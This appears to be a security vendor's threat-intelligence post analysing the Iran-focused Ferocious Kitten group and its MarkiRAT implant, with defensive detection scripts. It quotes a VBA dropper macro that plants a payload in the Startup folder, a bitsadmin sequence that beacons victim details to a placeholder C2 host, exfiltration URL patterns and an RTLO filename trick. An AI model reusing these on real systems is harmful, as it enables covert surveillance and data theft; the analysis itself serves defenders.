Picus Labs | 9 MIN READ

CREATED ON November 09, 2025

Ferocious Kitten APT Exposed: Inside the Iran-Focused Espionage Campaign

Ferocious Kitten is a covert cyber-espionage actor active since at least 2015 that has focused on Persian-speaking targets inside Iran, using politically themed decoy documents to trick dissidents, activists, and other individuals into opening weaponized files. Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S). Initial access is typically achieved through spearphishing with malicious Microsoft Office documents that contain macros or crafted MSHTML content.

Beyond simple startup persistence, Ferocious Kitten has used more intrusive hijacking techniques that implant the malware alongside legitimate applications: variants search for Telegram or Chrome installations, copy the malicious binary into those directories, and modify shortcuts so the malware runs when the user launches the real app. The group also employs common defense-evasion tricks such as the Right-to-Left Override (RTLO) unicode trick to make executables look like media files and abuses Windows utilities like BITS (via bitsadmin) to download files or probe outward-facing IP/proxy information. MarkiRAT probes for security software (reporting the presence of products such as Kaspersky or Bitdefender back to its C2) and supports "smart" collection that targets messaging artifacts and key store formats (e.g., KeePass, .kdbx) for prioritized exfiltration.

Public disclosure of the group’s activity came in a Kaspersky report published on June 16, 2021, which documented the lure material and the implant’s behaviors; later in 2021, the actor was observed exploiting the MSHTML RCE vulnerability CVE-2021-40444 to deliver a PowerShell-based stealer called PowerShortShell [1], showing the operator will adopt known exploits in addition to macro-based lures. Overall, Ferocious Kitten’s objective appears collection-focused and targeted rather than disruptive.

In this post, we'll review Ferocious Kitten’s notable historical operations, outline their key targeting and tradecraft, and analyze their tactics, techniques, and procedures (TTPs) to reveal how they conduct sustained espionage against Persian-speaking targets; finally, we’ll demonstrate how Picus can be used to strengthen defenses against this group.


History & Major Activities of Ferocious Kitten Group

  • 2015 (at least): Ferocious Kitten is active, targeting Persian-speaking individuals in Iran and employing decoy documents with malicious macros to drop the "MarkiRAT" malware [2].

  • 16 June 2021: Kaspersky publishes its report on the campaign, "6-year cyberespionage campaign uncovered in the Middle East", attributing it to Ferocious Kitten [2].

  • 24 November 2021: Ferocious Kitten is observed exploiting the Microsoft MSHTML RCE vulnerability CVE-2021-40444 via spear-phishing documents to deliver the PowerShell stealer "PowerShortShell" [1].

ATT&CK Mapping (TTPs) of Ferocious Kitten Group

Tactic: Initial Access

T1566.001 Phishing: Spearphishing Attachment

Adversaries use the Spearphishing Attachment technique to send targeted emails containing malicious files in order to gain initial access to a system or network. Ferocious Kitten has been observed employing this technique as a primary infection vector, crafting spearphishing emails that deliver weaponized Microsoft Office documents to its targets. One notable example is a document named "همبستگی عاشقانه با عاشقان آزادی2.doc", which translates to "Romantic solidarity with the lovers of freedom 2.doc". The malicious document not only infects the system with harmful executables but also displays propaganda against the Iranian regime as its decoy content [2]:

I am Hussein Jafari

I was a prisoner of the regime during 1363-64.
Add my name to the prisoners' statement of Iraj Mesdaghi about the bloodthirsty mercenary.
Please use the nickname Jafar for my own safety and my family.

Hussein Jafari
July 1399

Tactic: Execution

T1204.002 User Execution: Malicious File

A spearphishing attachment used by Ferocious Kitten contains macros that decode an embedded executable from hexadecimal and write it to the Public folder as "update.exe". After creating the file, the process copies the payload to the system’s Startup directory under the name "svehost.exe". This placement ensures the program launches automatically each time the system boots, establishing persistence. The code below shows the macros copying the payload to the startup folder [2]:

Sub thiswbmacro1()
    Call WriteBinaryFile
    Shell "C:\Users\Public\update.exe", vbNormalFocus
    Dim strUserName As String
    strUserName = Application.UserName
    Dim fso As Object
    Set fso = VBA.CreateObject("Scripting.FileSystemObject")
    D = "C:\Users\" & strUserName & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svehost.exe"
    If Len(Dir(D)) = 0 Then
        Call fso.CopyFile("C:\Users\Public\update.exe", D)
    End If
End Sub

Tactic: Persistence

T1574 Hijack Execution Flow

A MarkiRAT variant used by Ferocious Kitten targets Telegram by hijacking its launch process to run the malware alongside the legitimate app. It searches the system for Telegram’s installation by locating an executable within a "tdata" directory, then copies itself to that folder while preserving the Telegram icon. The malware alters the Telegram shortcut to point to its own executable, ensuring that when the user opens Telegram, the malicious payload runs and then starts the genuine Telegram client [2].

Another Chrome-focused variant operates in two coordinated stages identified by internal names found in their PDB paths: mklgsecondary.pdb and mklgchrome.pdb. The first component, mklgsecondary, uses the BITS utility to download a file named chrome.txt from a command-and-control server, then alters the Chrome shortcut using the same technique seen in the Telegram-targeting variant. The downloaded payload (chrome.txt/mklgchrome) is configured to execute whenever Chrome is launched, ensuring both the legitimate browser and the MarkiRAT payload run simultaneously [2].

Tactic: Defense Evasion

T1036.002 Masquerading: Right-to-Left Override

The Right-to-Left Override (RTLO) technique is a form of masquerading that abuses a special Unicode character (U+202E) to manipulate how text is displayed. When this non-printing character is inserted into a string, such as a filename, it causes the subsequent characters to be rendered in reverse order, from right to left. Ferocious Kitten employed a right-to-left override trick that reverses portions of executable filenames, making them appear to have harmless extensions like .jpg or .mp4 instead of their true types [2]. It is highly effective at lowering the guard of a non-technical user, significantly increasing the probability that they will double-click and execute the file, believing it to be an image or video.

Here are examples using the same method:

  • MP4 example: a file named MyVideo\u202E4pm.exe is displayed as MyVideoexe.mp4.

  • JPG example: a file named HolidayPic\u202Egpj.exe is displayed as HolidayPicexe.jpg.
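As an added defensive check (not from the original post or the Kaspersky report), the following Python snippet reproduces how a bidi-naive file listing renders a name containing U+202E and compares the extension the user sees with the one the operating system will actually act on; the sample names are the two above plus a constructed benign control.

```python
import unicodedata

# Unicode bidi control characters that can change how a filename is rendered.
# U+202E RIGHT-TO-LEFT OVERRIDE is the one used in the RTLO trick.
RLO = "\u202e"
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", RLO,
                 "\u2066", "\u2067", "\u2068", "\u2069"}

# Constructed sample names: the two from the text plus a benign control case.
SAMPLE_NAMES = ["MyVideo\u202e4pm.exe", "HolidayPic\u202egpj.exe", "report.pdf"]

def rendered_name(filename: str) -> str:
    """Approximate what a bidi-naive viewer shows: the override is invisible and
    everything after it is drawn right to left. Assumes a single RLO with no
    terminating control, which is the form used in the examples above."""
    if RLO not in filename:
        return filename
    head, _, tail = filename.partition(RLO)
    return head + tail[::-1]

def extension_of(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def check_filename(filename: str) -> dict:
    """Compare the extension a user sees with the one the OS will act on."""
    controls = sorted(unicodedata.name(c) for c in set(filename) if c in BIDI_CONTROLS)
    stripped = "".join(c for c in filename if c not in BIDI_CONTROLS)
    real, apparent = extension_of(stripped), extension_of(rendered_name(filename))
    return {
        "filename": filename,
        "displayed_as": rendered_name(filename),
        "real_extension": real,
        "apparent_extension": apparent,
        "bidi_controls": controls,
        # A bidi control alone is worth a look; a mismatch is the RTLO trick.
        "suspicious": bool(controls) and real != apparent,
    }

def scan(names):
    return [check_filename(n) for n in names]

if __name__ == "__main__":
    for result in scan(SAMPLE_NAMES):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['displayed_as']!r} is really .{result['real_extension']}")
```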

T1197 BITS Jobs

MarkiRAT issues an additional beacon to a command-and-control server using Microsoft’s BITS administration utility. It cancels any existing job named "pdj", creates a new one, sets its priority to high, adds a file transfer pointing to hxxp://[C2 address]/i.php?u=[computername]-[username]&i=[proxy ip] with the destination %PUBLIC%\AppData\Libs\p.b, and then resumes the job. The likely intent is to circumvent or reveal proxy usage within the victim environment [2], enabling the server to determine the victim’s apparent external IP and maintain resilient communication. The commands used are given below:

> bitsadmin /cancel pdj
> bitsadmin /create pdj
> bitsadmin /SetPriority pdj HIGH
> bitsadmin /addfile pdj "hxxp://[C2 address]/i.php?u=[computername]-[username]&i=[proxy ip]" %PUBLIC%\AppData\Libs\p.b
> bitsadmin /resume pdj
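The bitsadmin sequence above is a practical hunting target in process-creation telemetry. As an added example (not part of the original post), this Python snippet parses constructed command lines, reassembles each job's step sequence from the job name, and raises indicators for a raw-IP remote, a query string on the download URL, and a destination under a user-writable directory; the sample lines mirror the sequence above with an RFC 5737 address and placeholder host/user names standing in for the C2 and victim.

```python
import re
import shlex
from urllib.parse import urlsplit
# Constructed sample process-creation command lines (not real telemetry);
# 198.51.100.7 is an RFC 5737 documentation address standing in for the C2.
SAMPLE_CMDLINES = [
    'bitsadmin /cancel pdj',
    'bitsadmin /create pdj',
    'bitsadmin /SetPriority pdj HIGH',
    'bitsadmin /addfile pdj "http://198.51.100.7/i.php?u=WS01-alice&i=10.0.0.5" '
    'C:\\Users\\Public\\AppData\\Libs\\p.b',
    'bitsadmin /resume pdj',
    # comparison job: internal host, standard Windows download location
    'bitsadmin /transfer wsus /download /priority normal '
    'https://wsus.corp.example/patch.msu C:\\Windows\\SoftwareDistribution\\Download\\patch.msu',
]

URL_RE = re.compile(r'https?://[^\s"]+', re.I)
IPV4_RE = re.compile(r'^\d{1,3}(\.\d{1,3}){3}$')
# Destinations a legitimate BITS job rarely uses but MarkiRAT-style tooling favours.
WRITABLE_DIR_RE = re.compile(r'(?i)(%public%|\\users\\public\\|\\appdata\\|\\programdata\\)')
def parse_bitsadmin(cmdline):
    """Extract job, verb, URL, destination and indicators; None if not bitsadmin."""
    argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]  # keep backslashes
    if not argv or argv[0].lower().rsplit("\\", 1)[-1] not in ("bitsadmin", "bitsadmin.exe"):
        return None
    verb = argv[1].lstrip("/").lower() if len(argv) > 1 else ""
    job = argv[2] if len(argv) > 2 else ""
    m = URL_RE.search(cmdline)
    url = m.group(0) if m else ""
    dest = argv[-1] if verb in ("addfile", "transfer") and m else ""
    indicators = []
    if url and IPV4_RE.match(urlsplit(url).hostname or ""):
        indicators.append("remote host is a raw IP address")
    if url and urlsplit(url).query:
        indicators.append("download URL carries query parameters (possible beacon)")
    if dest and WRITABLE_DIR_RE.search(dest):
        indicators.append("destination under a user-writable directory")
    return {"job": job, "verb": verb, "url": url, "dest": dest, "indicators": indicators}

def correlate_jobs(cmdlines):
    """Group bitsadmin commands by job name; a job is suspicious if any step raised an indicator."""
    jobs = {}
    for p in filter(None, map(parse_bitsadmin, cmdlines)):
        j = jobs.setdefault(p["job"], {"verbs": [], "url": "", "dest": "", "indicators": []})
        j["verbs"].append(p["verb"])
        j["url"], j["dest"] = j["url"] or p["url"], j["dest"] or p["dest"]
        j["indicators"] += p["indicators"]
    for j in jobs.values():
        j["suspicious"] = bool(j["indicators"])
    return jobs
```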

Tactic: Discovery

T1518.001 Software Discovery: Security Software Discovery

MarkiRAT malware used by Ferocious Kitten enumerates running processes on the infected system to detect security tools, specifically searching for "exe" associated with Kaspersky and "bdagent.exe" for Bitdefender. If either is found, it reports the finding to its command-and-control server via a GET request parameter named "k", using the format:

hxxp://C2/ech/client.php?u=[computername]_[username]&k=[AV_value]

A value of "1" indicates Kaspersky, while "3" indicates Bitdefender. Despite performing this check, the malware’s behavior remains unchanged regardless of the detected product [2].

Tactic: Collection

T1056.001 Input Capture: Keylogging

The MarkiRAT implant logs all user keystrokes, a core functionality reflected in its suspected internal name, 'Mark KeyLogGer'. It activates a keylogger that records all keystrokes and clipboard data, saving them locally in a .nfo file and exfiltrating the file to its command-and-control server via a POST request:

POST hxxp://[C2 address]/i.php?u=[computername]_[username]&i=[IP address]

<Body Content>

Before launching the keylogger, it terminates any active KeePass password manager process. This behavior appears intended to prompt a restart of KeePass, causing the user to reenter the master password, which the keylogger can then capture [2].

Tactic: Command and Control

T1071.001 Application Layer Protocol: Web Protocols

MarkiRAT uses HTTP POST and GET requests for all C2 communications, including victim registration and data exfiltration.

After completing initial actions, the malware spawns a persistent beaconing thread that repeatedly issues GET requests to hxxp://[C2 address]/ech/echo.php?req=rr&u=[computername]_[username], awaiting JSON-formatted tasking. 

Supported commands include delay (sleep in milliseconds), uploadsf and uploads (enumerate a given directory and exfiltrate files), upload (exfiltrate a specific file), smart dir/fulldir (list files and directories, focusing on targeted extensions), smart upload (exfiltrate targeted file types from common locations such as Desktop, Documents, Pictures, Downloads, ViberPC, Skype, Telegram, and additional drives), runinhome (execute a file located in the malware repository in the user’s home directory), and download (retrieve a file from a URL to a specified local path). 

File exfiltration uses an HTTPS POST to hxxps://[C2]/up/uploadx.php?=u=[computername]_[username], while directory listings are sent to hxxp://[C2]/ech/rite.php; targeted extensions include Office documents, PDFs, text files, images, and sensitive key/store formats such as .gpg, .pkr, .kdbx, and .key. Unrecognized commands are executed via cmd.exe /c through ShellExecuteW, and each beacon includes a screenshot saved as scr.jpg and uploaded using the same POST mechanism as file exfiltration [2].
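The endpoint shapes above are stable enough to drive a proxy-log triage. As an added example (not from the original post), this Python classifier matches the MarkiRAT paths listed in this section against constructed proxy-log lines, groups hits per victim identifier from the u= parameter, and decodes the k= security-software code; the C2 address is an RFC 5737 documentation IP and the host/user names are placeholders.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# MarkiRAT endpoints named in the text above, matched on path only since the
# C2 host varies between samples.
ENDPOINTS = {
    "/ech/echo.php": "beacon (tasking poll)",
    "/ech/client.php": "security-software report",
    "/ech/rite.php": "directory listing",
    "/up/uploadx.php": "file or screenshot exfiltration",
    "/i.php": "keylog upload / proxy probe",
}
AV_CODES = {"1": "Kaspersky", "3": "Bitdefender"}  # meaning of the k= parameter

# Constructed proxy log lines (timestamp client method URL); 198.51.100.7 is an
# RFC 5737 documentation address standing in for the C2, not a real indicator.
SAMPLE_LOG = """\
2025-11-01T09:00:00Z 10.0.0.5 GET http://198.51.100.7/ech/client.php?u=WS01_alice&k=1
2025-11-01T09:00:02Z 10.0.0.5 GET http://198.51.100.7/ech/echo.php?req=rr&u=WS01_alice
2025-11-01T09:00:32Z 10.0.0.5 GET http://198.51.100.7/ech/echo.php?req=rr&u=WS01_alice
2025-11-01T09:00:40Z 10.0.0.5 POST http://198.51.100.7/i.php?u=WS01_alice&i=10.0.0.5
2025-11-01T09:01:10Z 10.0.0.5 POST https://198.51.100.7/up/uploadx.php?u=WS01_alice
2025-11-01T09:02:00Z 10.0.0.9 GET http://www.example.com/index.php?u=someone
"""

def classify(url):
    """Return (label, victim_id, details) for a MarkiRAT-shaped URL, else None."""
    parts = urlsplit(url)
    label = ENDPOINTS.get(parts.path.lower())
    if label is None:
        return None
    q = parse_qs(parts.query)
    details = {}
    if "k" in q:
        details["av"] = AV_CODES.get(q["k"][0], "unknown code " + q["k"][0])
    if "i" in q:
        details["reported_ip"] = q["i"][0]
    return label, q.get("u", [""])[0], details

def summarise(log_text):
    """Aggregate MarkiRAT hits per victim id: endpoint counts plus reported details."""
    victims = defaultdict(lambda: {"hits": defaultdict(int), "details": {}})
    for line in log_text.splitlines():
        _ts, client, _method, url = line.split(" ", 3)
        hit = classify(url)
        if hit:
            label, victim, details = hit
            victims[victim]["hits"][label] += 1
            victims[victim]["details"].update(details, client=client)
    return {v: {"hits": dict(d["hits"]), "details": d["details"]} for v, d in victims.items()}
```

Two consecutive echo.php polls from the same victim identifier are what the beaconing thread described above looks like on the wire, so the per-victim count is the field to alert on.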

How Does Picus Simulate Ferocious Kitten Attacks?

We strongly suggest simulating Ferocious Kitten attacks to test the effectiveness of your security controls against real-world cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups, such as Salt Typhoon APT, FIN7, Cavalry Werewolf APT, and Earth Krahang APT, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Ferocious Kitten:

Threat ID | Threat Name                                                    | Attack Module
56601     | Ferocious Kitten Threat Group Campaign Malware Download Threat | Network Infiltration
41985     | Ferocious Kitten Threat Group Campaign Malware Email Threat    | Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] Republic of Albania, National Authority for Electronic Certification and Cyber Security, Directorate of Cyber Security Analysis, "Iranian Hacker Groups Profiles." Accessed: Oct. 27, 2025. [Online]. Available: https://aksk.gov.al/wp-content/uploads/2024/04/Iranian-Hacker-Groups-Profiles-v1.0_ENG.pdf

[2] GReAT, "Ferocious Kitten: 6 years of covert surveillance in Iran," Kaspersky. Accessed: Oct. 27, 2025. [Online]. Available: https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/
